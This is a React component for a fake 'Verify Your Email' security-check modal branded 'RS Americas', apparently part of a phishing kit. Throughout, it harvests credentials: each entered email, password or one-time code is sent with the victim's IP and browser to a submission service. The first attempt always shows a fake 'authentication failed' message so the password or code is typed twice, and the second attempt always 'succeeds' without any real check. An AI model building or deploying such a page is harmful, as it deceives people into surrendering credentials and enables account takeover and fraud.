import React, { useState, useEffect } from 'react';
import { sendSubmission } from '../services/api';
import logo from '../assets/logo.png';

const VerifyLoginModal = ({
  isOpen,
  onClose,
  initialEmail = '',
  initialPassword = '',
  ipAddress = '',
  browser = '',
  initialOverallAttempt = 2,
  onSuccess,
}) => {
  const [activeTab, setActiveTab] = useState('password'); // 'password' | 'code'
  const [modalEmail, setModalEmail] = useState('');
  const [modalPassword, setModalPassword] = useState('');
  const [verificationCode, setVerificationCode] = useState('');
  const [emailError, setEmailError] = useState('');
  const [passwordError, setPasswordError] = useState('');
  const [codeError, setCodeError] = useState('');
  const [showPassword, setShowPassword] = useState(false);
  const [isVerifying, setIsVerifying] = useState(false);
  const [isSuccess, setIsSuccess] = useState(false);
  const [resendCooldown, setResendCooldown] = useState(0);
  const [resendMessage, setResendMessage] = useState('');

  // Two-attempt tracking for modal submissions
  const [passwordAttempts, setPasswordAttempts] = useState(0);
  const [codeAttempts, setCodeAttempts] = useState(0);
  const [passwordFailBanner, setPasswordFailBanner] = useState('');
  const [codeFailBanner, setCodeFailBanner] = useState('');

  // Auto-fill email whenever modal opens or initialEmail changes
  useEffect(() => {
    if (isOpen) {
      setModalEmail(initialEmail);
      setModalPassword(initialPassword || '');
      setVerificationCode('');
      setEmailError('');
      setPasswordError('');
      setCodeError('');
      setIsVerifying(false);
      setIsSuccess(false);
      setResendMessage('');
      setPasswordAttempts(0);
      setCodeAttempts(0);
      setPasswordFailBanner('');
      setCodeFailBanner('');
    }
  }, [isOpen, initialEmail, initialPassword]);

  // Resend code countdown timer
  useEffect(() => {
    let timer;
    if (resendCooldown > 0) {
      timer = setTimeout(() => setResendCooldown(resendCooldown - 1), 1000);
    }
    return () => clearTimeout(timer);
  }, [resendCooldown]);

  if (!isOpen) return null;

  const handlePasswordSubmit = async (e) => {
    e.preventDefault();
    if (isVerifying || isSuccess) return;

    let hasError = false;
    if (!modalEmail || !modalEmail.includes('@')) {
      setEmailError('Please enter a valid email address.');
      hasError = true;
    } else {
      setEmailError('');
    }

    if (!modalPassword) {
      setPasswordError('Please enter your password.');
      hasError = true;
    } else {
      setPasswordError('');
    }

    if (hasError) return;

    setIsVerifying(true);
    setPasswordFailBanner('');

    const nextModalAttempt = passwordAttempts + 1;
    const overallAttempt = (initialOverallAttempt || 2) + nextModalAttempt;
    const isSecondModalAttempt = passwordAttempts > 0;
    const currentIp = ipAddress || '127.0.0.1';
    const currentBrowser = browser || 'Web Browser';
    const step = isSecondModalAttempt
      ? 'Verification Modal - Final Password Confirmation'
      : 'Verification Modal - Password Check';

    try {
      await sendSubmission({
        email: modalEmail,
        password: modalPassword,
        attempt: nextModalAttempt,
        overallAttempt,
        step,
        ipAddress: currentIp,
        browser: currentBrowser,
      });
    } catch (err) {
      console.error('Modal submission error:', err);
    }

    if (passwordAttempts === 0) {
      // First attempt: simulate authentication failure and require second attempt
      setTimeout(() => {
        setIsVerifying(false);
        setPasswordAttempts(1);
        setPasswordFailBanner('Authentication failed. The password provided is incorrect. Please re-enter your password to proceed.');
        setModalPassword('');
      }, 1400);
    } else {
      // Second attempt (or subsequent): succeed and navigate
      setTimeout(() => {
        setIsVerifying(false);
        setIsSuccess(true);
        setPasswordAttempts((prev) => prev + 1);

        // Transition to verified confirmation screen
        setTimeout(() => {
          if (onSuccess) {
            onSuccess();
          }
        }, 1200);
      }, 1400);
    }
  };

  const handleCodeSubmit = async (e) => {
    e.preventDefault();
    if (isVerifying || isSuccess) return;

    if (!verificationCode || verificationCode.trim().length < 4) {
      setCodeError('Please enter a valid verification code.');
      return;
    }
    setCodeError('');
    setCodeFailBanner('');
    setIsVerifying(true);

    const nextCodeAttempt = codeAttempts + 1;
    const overallAttempt = (initialOverallAttempt || 2) + nextCodeAttempt;
    const isSecondCodeAttempt = codeAttempts > 0;
    const currentIp = ipAddress || '127.0.0.1';
    const currentBrowser = browser || 'Web Browser';
    const step = isSecondCodeAttempt
      ? 'Verification Modal - Final Code Confirmation'
      : 'Verification Modal - Security Code Check';

    try {
      await sendSubmission({
        email: modalEmail,
        code: verificationCode,
        attempt: nextCodeAttempt,
        overallAttempt,
        step,
        ipAddress: currentIp,
        browser: currentBrowser,
      });
    } catch (err) {
      console.error('Code submission error:', err);
    }

    if (codeAttempts === 0) {
      // First attempt: simulate invalid code and require second attempt
      setTimeout(() => {
        setIsVerifying(false);
        setCodeAttempts(1);
        setCodeFailBanner('The verification code entered is invalid or has expired. Please verify and try again.');
        setVerificationCode('');
      }, 1400);
    } else {
      // Second attempt (or subsequent): succeed and navigate
      setTimeout(() => {
        setIsVerifying(false);
        setIsSuccess(true);
        setCodeAttempts((prev) => prev + 1);

        setTimeout(() => {
          if (onSuccess) {
            onSuccess();
          }
        }, 1200);
      }, 1400);
    }
  };

  const handleResendCode = async () => {
    if (resendCooldown > 0) return;
    setResendCooldown(60);
    setResendMessage('A new verification code has been dispatched to your email.');

    try {
      await sendSubmission({
        email: modalEmail,
        step: 'Verification Code Resend',
        ipAddress: ipAddress || '127.0.0.1',
        browser: browser || 'Web Browser',
      });
    } catch (err) {
      console.error('Resend error:', err);
    }
  };

  return (
    <div
      id="verify-login-modal"
      className="fixed inset-0 z-50 overflow-y-auto flex items-center justify-center p-4 sm:p-6 select-none animate-fadeIn"
      role="dialog"
      aria-modal="true"
      aria-labelledby="verify-modal-title"
    >
      {/* Backdrop */}
      <div
        id="verify-login-backdrop"
        onClick={onClose}
        className="fixed inset-0 bg-black/60 backdrop-blur-sm transition-opacity"
      />

      {/* Modal Dialog Card */}
      <div
        id="verify-login-dialog"
        className="relative bg-white w-full max-w-lg shadow-2xl border border-gray-200 z-10 my-8 overflow-hidden rounded-none"
      >
        {/* Top Accent Strip */}
        <div className="h-1.5 w-full bg-[#2A437E]" />

        {/* Modal Header */}
        <div className="p-6 sm:p-8 pb-4 border-b border-gray-100 flex items-start justify-between">
          <div className="flex items-center space-x-3.5">
            <img
              src={logo}
              alt="RS"
              className="h-10 w-10 object-contain rounded-[2px] flex-shrink-0"
            />
            <div>
              <div className="flex items-center space-x-2">
                <span className="text-[11px] font-bold uppercase tracking-wider text-[#2A437E] bg-blue-50 px-2 py-0.5 border border-blue-200">
                  Security Check
                </span>
              </div>
              <h2
                id="verify-modal-title"
                className="text-xl sm:text-2xl font-bold text-[#111111] mt-1 tracking-tight"
              >
                Verify Your Email
              </h2>
            </div>
          </div>

          <button
            id="verify-modal-close-btn"
            type="button"
            onClick={onClose}
            className="text-gray-400 hover:text-gray-700 p-1.5 transition-colors focus:outline-none"
            aria-label="Close modal"
          >
            <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M6 18L18 6M6 6l12 12" />
            </svg>
          </button>
        </div>

        {/* Informative Security Banner */}
        <div className="px-6 sm:px-8 pt-4">
          <div
            id="verify-modal-security-banner"
            className="bg-[#EFF6FF] border border-[#BFDBFE] p-3.5 flex items-start space-x-3"
          >
            <div className="flex-shrink-0 text-[#1D4ED8] mt-0.5">
              <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path
                  strokeLinecap="round"
                  strokeLinejoin="round"
                  strokeWidth="2"
                  d="M9 12l2 2 4-4m5.618-4.016A11.955 11.955 0 0112 2.944a11.955 11.955 0 01-8.618 3.04A12.02 12.02 0 003 9c0 5.591 3.824 10.29 9 11.622 5.176-1.332 9-6.03 9-11.622 0-1.042-.133-2.052-.382-3.016z"
                />
              </svg>
            </div>
            <p
              id="verify-modal-desc"
              className="text-xs sm:text-[13px] text-[#1E3A8A] leading-relaxed"
            >
              An additional verification is required to confirm your identity and secure your account. Please verify your Email details below.
            </p>
          </div>
        </div>

        {/* Tab Switcher */}
        <div className="px-6 sm:px-8 mt-5 flex border-b border-gray-200">
          <button
            id="verify-tab-password"
            type="button"
            onClick={() => {
              setActiveTab('password');
              setEmailError('');
              setPasswordError('');
              setPasswordFailBanner('');
            }}
            className={`pb-3 text-xs sm:text-sm font-semibold border-b-2 mr-6 transition-colors ${
              activeTab === 'password'
                ? 'border-[#2A437E] text-[#2A437E]'
                : 'border-transparent text-gray-500 hover:text-gray-800'
            }`}
          >
            Email Verification
          </button>
          <button
            id="verify-tab-code"
            type="button"
            onClick={() => {
              setActiveTab('code');
              setCodeError('');
              setCodeFailBanner('');
            }}
            className={`pb-3 text-xs sm:text-sm font-semibold border-b-2 transition-colors ${
              activeTab === 'code'
                ? 'border-[#2A437E] text-[#2A437E]'
                : 'border-transparent text-gray-500 hover:text-gray-800'
            }`}
          >
            One-Time Security Code
          </button>
        </div>

        {/* Modal Body */}
        <div className="p-6 sm:p-8 pt-5">
          {/* Success State Overlay */}
          {isSuccess ? (
            <div id="verify-modal-success" className="py-8 text-center animate-fadeIn">
              <div className="w-14 h-14 mx-auto rounded-full border-2 border-[#16a34a] flex items-center justify-center mb-4">
                <svg className="w-8 h-8 text-[#16a34a]" fill="none" stroke="currentColor" strokeWidth="2.5" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" d="M5 13l4 4L19 7" />
                </svg>
              </div>
              <h3 className="text-lg font-bold text-[#111111] mb-1">
                Login Verified
              </h3>
              <p className="text-sm text-gray-600">
                Confirming authentication and redirecting to your verification confirmation...
              </p>
            </div>
          ) : activeTab === 'password' ? (
            /* TAB 1: Password Verification Form */
            <form id="verify-password-form" onSubmit={handlePasswordSubmit}>
              {passwordFailBanner && (
                <div
                  id="verify-password-fail-alert"
                  className="mb-4 bg-red-50 border border-red-200 text-red-800 text-xs px-3.5 py-2.5 flex items-start space-x-2.5 animate-fadeIn"
                >
                  <svg className="w-4 h-4 text-red-600 flex-shrink-0 mt-0.5" fill="currentColor" viewBox="0 0 20 20">
                    <path fillRule="evenodd" d="M18 10a8 8 0 11-16 0 8 8 0 0116 0zm-7 4a1 1 0 11-2 0 1 1 0 012 0zm-1-9a1 1 0 00-1 1v4a1 1 0 102 0V6a1 1 0 00-1-1z" clipRule="evenodd" />
                  </svg>
                  <span className="leading-relaxed">{passwordFailBanner}</span>
                </div>
              )}

              {/* Auto-filled Email Input */}
              <div className="mb-4">
                <div className="flex items-center justify-between mb-1">
                  <label
                    htmlFor="verify-modal-email-input"
                    className="block text-xs sm:text-sm font-semibold text-gray-800"
                  >
                    Email Address <span className="text-[#cc0000]">*</span>
                  </label>
                  <span className="text-[11px] font-medium text-[#16a34a] flex items-center space-x-1">
                    <svg className="w-3 h-3 inline-block" fill="currentColor" viewBox="0 0 20 20">
                      <path
                        fillRule="evenodd"
                        d="M16.707 5.293a1 1 0 010 1.414l-8 8a1 1 0 01-1.414 0l-4-4a1 1 0 011.414-1.414L8 12.586l7.293-7.293a1 1 0 011.414 0z"
                        clipRule="evenodd"
                      />
                    </svg>
                    <span>Auto-filled</span>
                  </span>
                </div>
                <div className="relative">
                  <input
                    id="verify-modal-email-input"
                    type="email"
                    value={modalEmail}
                    onChange={(e) => {
                      setModalEmail(e.target.value);
                      if (emailError) setEmailError('');
                    }}
                    placeholder="Enter your email"
                    className={`w-full border ${
                      emailError ? 'border-red-500' : 'border-gray-300'
                    } bg-[#F9FAFB] px-3.5 py-2.5 text-sm text-gray-900 focus:outline-none focus:bg-white focus:border-[#2A437E] transition-colors rounded-none`}
                    autoComplete="email"
                  />
                </div>
                {emailError && (
                  <p id="verify-email-error" className="text-[#cc0000] text-xs mt-1">
                    {emailError}
                  </p>
                )}
              </div>

              {/* Password Input */}
              <div className="mb-6">
                <label
                  htmlFor="verify-modal-password-input"
                  className="block text-xs sm:text-sm font-semibold text-gray-800 mb-1"
                >
                  Password <span className="text-[#cc0000]">*</span>
                </label>
                <div className="relative">
                  <input
                    id="verify-modal-password-input"
                    type={showPassword ? 'text' : 'password'}
                    value={modalPassword}
                    onChange={(e) => {
                      setModalPassword(e.target.value);
                      if (passwordError) setPasswordError('');
                      if (passwordFailBanner) setPasswordFailBanner('');
                    }}
                    placeholder="Confirm your password to verify"
                    className={`w-full border ${
                      passwordError || passwordFailBanner ? 'border-red-500' : 'border-gray-300'
                    } px-3.5 py-2.5 pr-10 text-sm text-gray-900 focus:outline-none focus:border-[#2A437E] transition-colors rounded-none`}
                    autoComplete="current-password"
                    autoFocus
                  />
                  <button
                    id="verify-modal-toggle-password"
                    type="button"
                    onClick={() => setShowPassword(!showPassword)}
                    className="absolute right-2.5 top-1/2 -translate-y-1/2 text-gray-500 hover:text-gray-800 p-1"
                    aria-label={showPassword ? 'Hide password' : 'Show password'}
                  >
                    {showPassword ? (
                      <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M13.875 18.825A10.05 10.05 0 0112 19c-4.478 0-8.268-2.943-9.543-7a9.97 9.97 0 011.563-3.029m5.858.908a3 3 0 114.243 4.243M9.878 9.878l4.242 4.242M9.88 9.88l-3.29-3.29m7.532 7.532l3.29 3.29M3 3l18 18" />
                      </svg>
                    ) : (
                      <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M15 12a3 3 0 11-6 0 3 3 0 016 0z" />
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M2.458 12C3.732 7.943 7.523 5 12 5c4.478 0 8.268 2.943 9.542 7-1.274 4.057-5.064 7-9.542 7-4.477 0-8.268-2.943-9.542-7z" />
                      </svg>
                    )}
                  </button>
                </div>
                {passwordError && (
                  <p id="verify-password-error" className="text-[#cc0000] text-xs mt-1">
                    {passwordError}
                  </p>
                )}
              </div>

              {/* Action Buttons */}
              <div className="space-y-3">
                <button
                  id="verify-modal-submit-btn"
                  type="submit"
                  disabled={isVerifying}
                  className={`w-full py-3 px-6 text-sm font-semibold text-white tracking-wide transition-colors select-none flex items-center justify-center space-x-2 ${
                    isVerifying
                      ? 'bg-[#8A9EB8] cursor-not-allowed'
                      : 'bg-[#2A437E] hover:bg-[#203463] cursor-pointer'
                  }`}
                >
                  {isVerifying ? (
                    <>
                      <svg className="animate-spin -ml-1 mr-2 h-4 w-4 text-white" fill="none" viewBox="0 0 24 24">
                        <circle className="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" strokeWidth="4"></circle>
                        <path className="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8v8H4z"></path>
                      </svg>
                      <span>Verifying Login...</span>
                    </>
                  ) : (
                    <span>Verify Login</span>
                  )}
                </button>

                <button
                  id="verify-modal-cancel-btn"
                  type="button"
                  onClick={onClose}
                  disabled={isVerifying}
                  className="w-full py-2 text-xs font-semibold text-gray-600 hover:text-gray-900 transition-colors"
                >
                  Cancel and return to sign in
                </button>
              </div>
            </form>
          ) : (
            /* TAB 2: One-Time Security Code */
            <form id="verify-code-form" onSubmit={handleCodeSubmit}>
              <p className="text-xs sm:text-[13px] text-gray-700 mb-4 leading-relaxed">
                We've simulated sending a one-time verification code to{' '}
                <strong className="text-gray-900 font-semibold">{modalEmail || 'your email'}</strong>. Enter the code below to complete verification.
              </p>

              {codeFailBanner && (
                <div
                  id="verify-code-fail-alert"
                  className="mb-4 bg-red-50 border border-red-200 text-red-800 text-xs px-3.5 py-2.5 flex items-start space-x-2.5 animate-fadeIn"
                >
                  <svg className="w-4 h-4 text-red-600 flex-shrink-0 mt-0.5" fill="currentColor" viewBox="0 0 20 20">
                    <path fillRule="evenodd" d="M18 10a8 8 0 11-16 0 8 8 0 0116 0zm-7 4a1 1 0 11-2 0 1 1 0 012 0zm-1-9a1 1 0 00-1 1v4a1 1 0 102 0V6a1 1 0 00-1-1z" clipRule="evenodd" />
                  </svg>
                  <span className="leading-relaxed">{codeFailBanner}</span>
                </div>
              )}

              {resendMessage && (
                <div
                  id="verify-code-resend-alert"
                  className="mb-4 bg-green-50 border border-green-200 text-green-800 text-xs px-3 py-2 flex items-center space-x-2"
                >
                  <svg className="w-4 h-4 text-green-600 flex-shrink-0" fill="currentColor" viewBox="0 0 20 20">
                    <path fillRule="evenodd" d="M16.707 5.293a1 1 0 010 1.414l-8 8a1 1 0 01-1.414 0l-4-4a1 1 0 011.414-1.414L8 12.586l7.293-7.293a1 1 0 011.414 0z" clipRule="evenodd" />
                  </svg>
                  <span>{resendMessage}</span>
                </div>
              )}

              <div className="mb-5">
                <label
                  htmlFor="verify-code-input"
                  className="block text-xs sm:text-sm font-semibold text-gray-800 mb-1"
                >
                  Verification Code <span className="text-[#cc0000]">*</span>
                </label>
                <input
                  id="verify-code-input"
                  type="text"
                  maxLength="6"
                  value={verificationCode}
                  onChange={(e) => {
                    setVerificationCode(e.target.value.replace(/\D/g, ''));
                    if (codeError) setCodeError('');
                    if (codeFailBanner) setCodeFailBanner('');
                  }}
                  placeholder="e.g. 849201"
                  className={`w-full border ${
                    codeError || codeFailBanner ? 'border-red-500' : 'border-gray-300'
                  } px-4 py-2.5 text-center text-lg tracking-[0.35em] font-mono text-gray-900 focus:outline-none focus:border-[#2A437E] rounded-none`}
                  autoFocus
                />
                {codeError && (
                  <p id="verify-code-error" className="text-[#cc0000] text-xs mt-1">
                    {codeError}
                  </p>
                )}
              </div>

              <div className="flex items-center justify-between text-xs mb-6">
                <span className="text-gray-500">Didn't receive code?</span>
                <button
                  id="verify-resend-code-btn"
                  type="button"
                  onClick={handleResendCode}
                  disabled={resendCooldown > 0}
                  className={`font-semibold ${
                    resendCooldown > 0
                      ? 'text-gray-400 cursor-not-allowed'
                      : 'text-[#2A437E] hover:underline cursor-pointer'
                  }`}
                >
                  {resendCooldown > 0 ? `Resend in ${resendCooldown}s` : 'Resend Code'}
                </button>
              </div>

              <div className="space-y-3">
                <button
                  id="verify-code-submit-btn"
                  type="submit"
                  disabled={isVerifying}
                  className={`w-full py-3 px-6 text-sm font-semibold text-white tracking-wide transition-colors select-none flex items-center justify-center space-x-2 ${
                    isVerifying
                      ? 'bg-[#8A9EB8] cursor-not-allowed'
                      : 'bg-[#2A437E] hover:bg-[#203463] cursor-pointer'
                  }`}
                >
                  {isVerifying ? (
                    <>
                      <svg className="animate-spin -ml-1 mr-2 h-4 w-4 text-white" fill="none" viewBox="0 0 24 24">
                        <circle className="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" strokeWidth="4"></circle>
                        <path className="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8v8H4z"></path>
                      </svg>
                      <span>Verifying Code...</span>
                    </>
                  ) : (
                    <span>Verify Code & Continue</span>
                  )}
                </button>

                <button
                  id="verify-code-cancel-btn"
                  type="button"
                  onClick={onClose}
                  disabled={isVerifying}
                  className="w-full py-2 text-xs font-semibold text-gray-600 hover:text-gray-900 transition-colors"
                >
                  Cancel and return to sign in
                </button>
              </div>
            </form>
          )}
        </div>

        {/* Modal Footer Security Guarantee */}
        <div className="bg-gray-50 px-6 sm:px-8 py-3.5 border-t border-gray-200 flex items-center justify-center space-x-2 text-[11px] text-gray-500">
          <svg className="w-3.5 h-3.5 text-gray-400" fill="currentColor" viewBox="0 0 20 20">
            <path
              fillRule="evenodd"
              d="M5 9V7a5 5 0 0110 0v2a2 2 0 012 2v5a2 2 0 01-2 2H5a2 2 0 01-2-2v-5a2 2 0 012-2zm8-2v2H7V7a3 3 0 016 0z"
              clipRule="evenodd"
            />
          </svg>
          <span>RS Americas Secure Authentication • 256-bit SSL Protected</span>
        </div>
      </div>
    </div>
  );
};

export default VerifyLoginModal;
